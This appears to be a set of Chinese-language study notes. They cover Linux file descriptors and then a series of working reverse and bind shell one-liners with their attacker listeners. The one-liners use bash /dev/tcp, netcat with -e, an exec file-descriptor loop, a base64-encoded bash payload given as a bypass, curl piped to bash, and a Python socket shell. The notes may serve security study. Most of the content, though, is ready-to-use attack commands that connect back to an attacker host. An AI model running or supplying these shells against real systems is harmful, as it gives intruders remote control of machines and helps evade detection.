1、文件描述符(File Descriptor,FD)
本质:Liux内核给进程的非负整数标识,用于定位"打开的文件、设备、网络连接"(因iux遵循"一切
文件"设计,socket.、管道等/O资源也用文件描述符管理)。
默认值:每个进程启动时自动打开3个标准描述符:
o:标准输入(stdin,如键盘):
o1:标准输出(stdout,如终端屏幕);
o2:标准错误(stderr,如终端屏幕,专用于错误输出)。
自定义:用户可通过exec命令创建新描述符(如exec3<>file.txt让描述符3读写file.txt)。
tail打开一个文件
tail -f flag
获取tail进程PID
pidof tail
查看tail进程创建的文件描述符
ll /proc/98/fd

重定向是把输出定向到文件或者标准流。重定向输入输出本质上就是重定向文件描述符。
在linux中有个特殊的文件------/dev/null,所有写入的东西都会被清空
2、bash反弹shell原理
被控端
bash -i >& /dev/tcp/192.168.58.132/6666 0>&1
***
bash -i
打开一个交互式的bash shell。
>&,&>:混合输出,是把标准输出和错误输出都给了目标显示
0>&1:将标准输入的读取对象设置为标准输出的输出对象
/dev/tcp/IP/PORT
/dev/tcp/是Linux中的一个特殊设备文件(Linux一切皆文件),实际这个文件是不存在的,它只是 bash 实现的用来实现网络请求的一个接口。
打开这个文件就相当于发起了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。
/dev/tcp/192.168.58.132/6666
和192.168.58.132的6666端口建立TCP连接
***
控制端
nc --lvvp 6666

3、Linux反弹shell方法(看不同环境使用不同方法)
命令终端可以执行系统指令的地方就叫shell
(1)NC
nc正向shell
控制端:
nc 192.168.58.132 6666
被控端:
nc -lvvp 6666 -e /bin/sh
原 理:
被控端使用nc将/bin/sh绑定到本地的6666端口,控制端主动连接被控端的6666端口,即可获得shell

-e:是 Netcat 的参数,全称是--exec,表示 "在建立网络连接后,执行指定的程序";/bin/sh:是 Linux 系统中的 Shell 程序(等价于bash等交互式命令解释器);
nc反向shell
控制端:
nc -lvvp 6666
被控端:
nc -e /bin/sh 192.168.58.134 6666
原理:
被控端使用nc将/bin/sh发送到控制端的6666端口,控制端只需要监听本地的6666端口,即可获得shell。

通过文件描述符5,把 "控制端的输入(命令)"→"被控端的 Shell 执行"→"执行结果 / 错误返回控制端" 的全流程绑定到 TCP 连接上,最终实现和nc -e /bin/sh一样的反向 Shell 功能(但绕开了nc -e的限制)
被控端:
exec 5<>/dev/tcp/192.168.58.132/6666;cat <&5 | while read line; do $line 2>&5 >&5; done
控制端:
nc --lvvp 6666
(2)Bash
被控端:
bash -i >& /dev/tcp/192.168.58.132/6666 0>&1
控制端:
nc --lvvp 6666
base64编码绕过:
bash -c "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU4LjEzMi82NjY2IDA+JjE=|base64 -d|bash -i"
(3)curl
控制端创建一个html文件,然后开启http服务在托管该文件,然后目标用curl命令下载并执行
攻击者:
root@VM-0-2-ubuntu:~# cat index.html
bash -i >& /dev/tcp/IP/6666 0>&1
root@VM-0-2-ubuntu:~# python3 -m http.server
root@VM-0-2-ubuntu:~# nc -lvvp 6666
目标:
curl IP:8000|bash #
bash会读取管道传过来的内容(也就是刚下载的脚本),并立即执行其中的命令
(4)python
目标:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",6666));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
攻击者监听端口就好了
这种利用目标现有的语言环境反弹shell其实本质就是建造一个socket通信,像php什么语言也是一样的